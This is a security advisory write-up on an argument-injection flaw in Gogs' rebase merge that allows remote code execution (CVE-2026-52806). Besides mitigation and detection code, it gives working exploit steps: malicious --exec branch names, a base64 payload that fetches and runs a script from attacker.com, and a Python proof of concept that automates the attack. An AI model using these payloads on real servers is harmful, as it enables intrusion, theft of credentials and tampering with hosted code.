Gogs: Argument Injection in PR Merge Leading to Remote Code Execution (CVE-2026-52806) -DC-Jun2026-579


Gogs is a popular self-hosted Git service written in Go. A critical argument injection vulnerability exists in the pull request merge workflow, specifically within the “Rebase before merging” operation. The flaw resides in the `Merge()` function inside internal/database/pull.go, where the base branch name of a pull request is passed directly to the `git rebase` command without a POSIX `--` separator or proper sanitization.
An authenticated attacker can create a repository, enable the rebase merge option, and push a branch with a maliciously crafted name containing the `--exec` flag. When a pull request is created and merged using the rebase strategy, the branch name is interpreted by Git as a command-line argument rather than a branch reference. This causes the `--exec` flag to be processed, and the attacker-supplied command is executed via `sh -c` on the server.
The vulnerability exists because the `pr.BaseBranch` value, which originates from the URL parameter, is only validated using `git rev-parse --verify <ref>`, which checks that the ref resolves to a valid Git object but does not prevent argument injection. Git branch names can legally contain characters such as `$`, `{`, `}`, `=`, and `-`, allowing an attacker to craft a branch like `--exec=touch${IFS}/tmp/pwned`. During the rebase, this is parsed as the `--exec` flag, and the command executes.
The attack chain is fully automatable and does not require administrator privileges. Any authenticated user who can create a repository can enable rebase merging via the repository settings, making the exploit accessible to any registered user. On instances with open registration enabled (the default), this effectively allows unauthenticated attackers to gain remote code execution.
The vulnerability affects all Gogs versions up to and including 0.14.2, as well as the development branch 0.15.0+dev. A patch was released in version 0.14.3 on June 7, 2026. The issue has been assigned CVE-2026-52806.

DailyCVE Form

Platform: Gogs
Version: ≤ 0.14.2, 0.15.0+dev
Vulnerability: Argument Injection (CWE-88)
Severity: Critical (CVSS 9.9)
Date: 2026-03-16 (disclosed)

Prediction: Patch released 2026-06-07 (v0.14.3)

What Undercode Say

Analytics:

  • CVE ID: CVE-2026-52806
  • CVSS Score: 9.9 (Critical) — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • Affected Versions: All Gogs releases up to 0.14.2 and 0.15.0+dev (commit b53d3162)
  • Exploit Availability: Public PoC exists (Metasploit module added)
  • Patch Status: Fixed in v0.14.3 (June 7, 2026)
  • CWE: CWE-88 – Improper Neutralization of Argument Delimiters in a Command

Bash Commands & Codes:

# Create malicious branch
git update-ref 'refs/heads/--exec=touch${IFS}/tmp/pwned' HEAD
# Push malicious branch
git push origin 'refs/heads/--exec=touch${IFS}/tmp/pwned:refs/heads/--exec=touch${IFS}/tmp/pwned'
# Base64-encoded payload for complex commands
# Example: curl https://attacker.com/shell.sh|sh
BRANCH="--exec=echo${IFS}Y3VybCBodHRwczovL2F0dGFja2VyLmNvbS9zaGVsbC5zaHxzaA==|base64${IFS}-d|sh"
git update-ref "refs/heads/$BRANCH" HEAD

Python PoC Snippet (from Rapid7):

import requests

# Create repository via API ("pass" in the original snippet is a Python keyword; renamed to password)
requests.post(f"{target}/api/v1/user/repos", auth=(user, password), json={"name": repo_name})
# Enable rebase merge
requests.post(f"{target}/{user}/{repo}/settings/advanced", data={"enable_pulls": "on", "pulls_allow_rebase": "on"})
# Create PR with malicious base branch
pr_url = f"{target}/{user}/{repo}/compare/{malicious_branch}...{head_branch}"
requests.post(pr_url, data={"": "RCE"})
# Trigger merge
merge_url = f"{target}/{user}/{repo}/pulls/1/merge"
requests.post(merge_url, data={"merge_style": "rebase"})

Exploit

The exploitation process is as follows:

  1. Authenticate to the Gogs instance as any valid user.
  2. Create a repository (or use an existing one where rebase merging is enabled).
  3. Enable rebase merging via the repository settings (Settings → Advanced → Allow rebase).
  4. Push a malicious branch with a name containing the `--exec` flag and the desired command (using `${IFS}` to bypass space restrictions).
  5. Create a pull request with the malicious branch as the base and a legitimate branch as the head.
  6. Wait for the background `TestPullRequests` goroutine to mark the PR as mergeable (approximately 5 seconds).
  7. Trigger the merge using the “Rebase before merging” option. The `git rebase` command executes with the malicious branch name as an argument, causing the injected `--exec` command to run on the server.
  8. Verify the command execution (e.g., check for created files or receive a reverse shell).

Key Details:

  • The vulnerability is triggered in Step 3 of the `Merge()` function: git rebase --quiet '<malicious>' 'head_repo/feature'.
  • The subsequent `git checkout` of the malicious branch fails, resulting in an HTTP 500 error, but the RCE has already occurred.
  • On Windows, the base64 inline payload approach fails due to NTFS restrictions on the `|` character. Instead, the exploit uses a file-based payload delivery: the payload is committed as a script file, and the branch name becomes --exec=sh${IFS}<filename>.

Protection

Immediate Mitigation:

  • Upgrade to Gogs version 0.14.3 or later, which includes the fix.
  • If upgrading is not possible, disable the “Rebase before merging” option for all repositories (though this may not be feasible for all instances).
  • Restrict user registration to prevent untrusted users from creating accounts (set `DISABLE_REGISTRATION = true` in app.ini).

Permanent Fix (Code-Level):

  • Add a `--` separator to the `git rebase` command in internal/database/pull.go:
    "git", "rebase", "--quiet", "--", pr.BaseBranch, remoteHeadBranch
    
  • Validate branch names at the PR creation endpoint to reject names starting with `-`:
    if strings.HasPrefix(baseRef, "-") {
        c.NotFound()
        return nil, nil, nil, nil, "", ""
    }
    
  • Apply `--` separators to all other `process.ExecDir` calls that use `pr.BaseBranch` (e.g., `git clone -b`, `git checkout`, `git push`).
  • Ensure all Git commands use the safe `git-module` API with `--end-of-options` where applicable.
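The separator fix and the ref-name check described in the overview and in the code-level fix above, as an added Go example that is not Gogs' own code: `ValidateRefName`, `RebaseArgsVulnerable`, `RebaseArgsFixed` and `optionsSeenByGit` are names chosen here, and `optionsSeenByGit` is a deliberately simplified model of git's option parsing used only to show, without invoking git, why `--` changes how the branch name is interpreted.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// ErrUnsafeRef is returned for branch names that must never reach a git argv.
var ErrUnsafeRef = errors.New("unsafe ref name")

// ValidateRefName implements the check proposed for the PR creation endpoint
// (reject names starting with "-") plus a few git-check-ref-format rules.
// Hypothetical helper for this example; not Gogs code.
func ValidateRefName(ref string) error {
	switch {
	case ref == "":
		return fmt.Errorf("%w: empty name", ErrUnsafeRef)
	case strings.HasPrefix(ref, "-"):
		// "--exec=..." would be consumed as an option by git rebase.
		return fmt.Errorf("%w: %q starts with '-'", ErrUnsafeRef, ref)
	case strings.ContainsAny(ref, " \t\n~^:?*[\\"):
		return fmt.Errorf("%w: %q contains a forbidden character", ErrUnsafeRef, ref)
	case strings.Contains(ref, ".."), strings.HasSuffix(ref, ".lock"),
		strings.HasSuffix(ref, "/"), strings.HasSuffix(ref, "."):
		return fmt.Errorf("%w: %q has invalid ref syntax", ErrUnsafeRef, ref)
	}
	return nil
}

// RebaseArgsVulnerable has the shape of the original call in Merge():
// the base branch follows the options directly, so git still parses it.
func RebaseArgsVulnerable(base, head string) []string {
	return []string{"git", "rebase", "--quiet", base, head}
}

// RebaseArgsFixed is the patched shape: "--" ends option parsing, so every
// later argument is an operand whatever it starts with.
func RebaseArgsFixed(base, head string) []string {
	return []string{"git", "rebase", "--quiet", "--", base, head}
}

// optionsSeenByGit is a simplified model of git's argv handling: anything
// starting with "-" is taken as an option until "--" is reached. It exists
// only to make the effect of the separator visible without running git.
func optionsSeenByGit(argv []string) (opts, operands []string) {
	parsing := true
	for _, a := range argv[2:] { // skip "git" and the subcommand
		switch {
		case parsing && a == "--":
			parsing = false
		case parsing && strings.HasPrefix(a, "-"):
			opts = append(opts, a)
		default:
			operands = append(operands, a)
		}
	}
	return opts, operands
}

func main() {
	evil := "--exec=touch${IFS}/tmp/pwned" // the branch name from the advisory
	for _, argv := range [][]string{
		RebaseArgsVulnerable(evil, "head_repo/feature"),
		RebaseArgsFixed(evil, "head_repo/feature"),
	} {
		opts, operands := optionsSeenByGit(argv)
		fmt.Printf("%q\n  options:  %q\n  operands: %q\n", argv, opts, operands)
	}
	fmt.Println("validate:", ValidateRefName(evil))
}
```

Both layers are worth keeping: the `--` separator is the fix that removes the bug class regardless of what names git accepts, while the endpoint validation rejects the request early with a clean 404 instead of a 500 after a failed checkout.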

Detection:

  • Monitor server logs for errors containing `unknown option` or `exec=` in the context of `git checkout` or git rebase:
    ...merge: git checkout '--exec=<...>': exit status 128 - error: unknown option `exec=<...>'
    
  • Look for HTTP 500 errors on merge endpoints that may indicate exploitation attempts.
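The two detection signals above (the git "unknown option" error for an option-shaped ref, and HTTP 500s on a merge endpoint), as an added Go example that is not part of the page or of Gogs: `ScanLogs` and `Finding` are names chosen here, the request-log line format ("Completed POST /path STATUS") is an assumption, and the sample lines are constructed to mirror the error quoted above.

```go
package main

import (
	"fmt"
	"regexp"
)

// Finding is one log line worth an analyst's attention.
type Finding struct {
	Line   int    // 1-based position in the input
	Reason string // why it was flagged
	Text   string // the raw line
}

var (
	// git checkout/rebase refusing an option-shaped ref: the error text the
	// advisory quotes. The injected ref is captured for the report.
	reGitUnknownOpt = regexp.MustCompile(`git (checkout|rebase) '(-[^']*)'.*unknown option`)
	// Any --exec= inside a logged git argument (catches variants that did not
	// end in an "unknown option" error).
	reExecArg = regexp.MustCompile(`--exec=`)
	// Request-log line (format assumed): "... POST /owner/repo/pulls/N/merge STATUS ..."
	reMergeReq = regexp.MustCompile(`POST (/[^/ ]+/[^/ ]+/pulls/\d+/merge) (\d{3})`)
)

// ScanLogs returns every line matching one of the advisory's indicators.
func ScanLogs(lines []string) []Finding {
	var out []Finding
	for i, l := range lines {
		n := i + 1
		switch {
		case reGitUnknownOpt.MatchString(l):
			ref := reGitUnknownOpt.FindStringSubmatch(l)[2]
			out = append(out, Finding{Line: n, Reason: fmt.Sprintf("git rejected option-shaped ref %q", ref), Text: l})
		case reExecArg.MatchString(l):
			out = append(out, Finding{Line: n, Reason: "--exec= inside a git argument", Text: l})
		default:
			if m := reMergeReq.FindStringSubmatch(l); m != nil && m[2] == "500" {
				out = append(out, Finding{Line: n, Reason: "HTTP 500 on merge endpoint " + m[1], Text: l})
			}
		}
	}
	return out
}

// sampleLog is constructed for this example: two benign lines, then an error
// shaped like the one quoted in the Detection section, then the 500 that follows it.
var sampleLog = []string{
	"2026/06/08 10:00:01 [ INFO] Listen on http://0.0.0.0:3000",
	"2026/06/08 10:00:05 [TRACE] Completed POST /alice/demo/pulls/1/merge 302 Found in 120ms",
	"2026/06/08 10:00:07 [ERROR] ...merge: git checkout '--exec=touch${IFS}/tmp/pwned': exit status 128 - error: unknown option `exec=touch${IFS}/tmp/pwned'",
	"2026/06/08 10:00:07 [TRACE] Completed POST /alice/demo/pulls/1/merge 500 Internal Server Error in 4ms",
}

func main() {
	for _, f := range ScanLogs(sampleLog) {
		fmt.Printf("line %d: %s\n  %s\n", f.Line, f.Reason, f.Text)
	}
}
```

A 500 on a merge endpoint is noisy on its own; correlating it with a git error that names an option-shaped ref within the same second is the stronger signal, and the captured ref tells the responder which repository and branch to inspect.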

Impact

Successful exploitation allows an authenticated attacker to achieve remote code execution on the Gogs server with the privileges of the Gogs process user (typically git). The impact is severe:

  • Server Compromise: Arbitrary command execution as the Gogs process user, enabling full control over the server.
  • Cross-Tenant Data Breach: Read all repositories on the instance, including private repositories of other users, because all repositories are stored under a single `REPOSITORY_ROOT` directory with no OS-level isolation.
  • Credential Theft: Access the database containing password hashes, API tokens, SSH keys, and 2FA secrets for all users.
  • Lateral Movement: Pivot to other systems accessible from the server’s network.
  • Supply Chain Attacks: Silently modify code in any hosted repository, potentially injecting backdoors or malicious code.

The vulnerability is especially dangerous because:

  • Gogs ships with open registration enabled by default (DISABLE_REGISTRATION = false), making it exploitable by unauthenticated attackers on default installations.
  • Any user who creates a repository is automatically its admin and can enable rebase merging without special permissions.
  • The exploit leaves minimal traces (only a 500 error in logs), making detection difficult.

Sources:

Reported By: github.com